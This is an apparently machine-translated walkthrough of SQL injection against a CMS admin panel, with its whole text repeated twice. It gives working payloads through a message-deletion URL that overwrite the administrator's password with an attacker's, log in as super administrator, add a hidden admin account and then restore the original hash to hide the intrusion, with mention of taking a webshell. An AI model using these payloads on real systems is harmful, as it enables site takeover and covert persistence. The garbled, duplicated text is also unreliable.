Register a number first, enter the control panel and send a text message to yourself.
http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4
This is the point ```
The user name is admin Strange ```Can't catch``` OK I caught it~~~ The record does not exist because
=No login````````` ef0020cf8c5e45b9 Password is this```
Now we will start to update the administrator's password to the password of my registered user ````
Use the dynamic explosive library to modify the library program to first expose the adminname and password fields in pe_admin...
);update pe_admin set password=(select userpassword from pe_user
where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b)
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--
The meaning of this statement is to update the password of the user with ID=1 in the PE-ADMIN table to the user's password in the PE_USER table ````` Now look at it``` You need to convert hack520 to char
The update was successful `~~~~~ Now the password of the user with PE_admin table ID=1 has been updated to the password of hack520 ````` again ```
53dc3b60f2d40cd4 This is the password I registered before. OK. Log in to the background now.
Your username: admin
Your identity: Super Administrator
SMS to be read: 1
Success ````` then add an administrator for yourself. Then use the following statement ` to update the administrator's password back.
user
It is the registered username ```````````````````````````````` If you can enter the background, don't care about the others first``````. Take WEBSHELL and then talk about it```.
The time has just come, and now it continues. . . Change the administrator password back.
);declare @a sysname select @a=0x650066003000300032003000630066
0038006300350065003400350062003900 update pe_admin set passwo
rd=@a-- This one needs to be transferred
Update ``` Change the administrator password back. OK. Let's see if the modification is successful. ````ef0020cf8c5e45b9 is the original password?
Well, that's the end!
http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4
This is the point ```
The user name is admin Strange ```Can't catch``` OK I caught it~~~ The record does not exist because
=No login````````` ef0020cf8c5e45b9 Password is this```
Now we will start to update the administrator's password to the password of my registered user ````
Use the dynamic explosive library to modify the library program to first expose the adminname and password fields in pe_admin...
);update pe_admin set password=(select userpassword from pe_user
where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b)
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--
The meaning of this statement is to update the password of the user with ID=1 in the PE-ADMIN table to the user's password in the PE_USER table ````` Now look at it``` You need to convert hack520 to char
The update was successful `~~~~~ Now the password of the user with PE_admin table ID=1 has been updated to the password of hack520 ````` again ```
53dc3b60f2d40cd4 This is the password I registered before. OK. Log in to the background now.
Your username: admin
Your identity: Super Administrator
SMS to be read: 1
Success ````` then add an administrator for yourself. Then use the following statement ` to update the administrator's password back.
user
It is the registered username ```````````````````````````````` If you can enter the background, don't care about the others first``````. Take WEBSHELL and then talk about it```.
The time has just come, and now it continues. . . Change the administrator password back.
);declare @a sysname select @a=0x650066003000300032003000630066
0038006300350065003400350062003900 update pe_admin set passwo
rd=@a-- This one needs to be transferred
Update ``` Change the administrator password back. OK. Let's see if the modification is successful. ````ef0020cf8c5e45b9 is the original password?
Well, that's the end!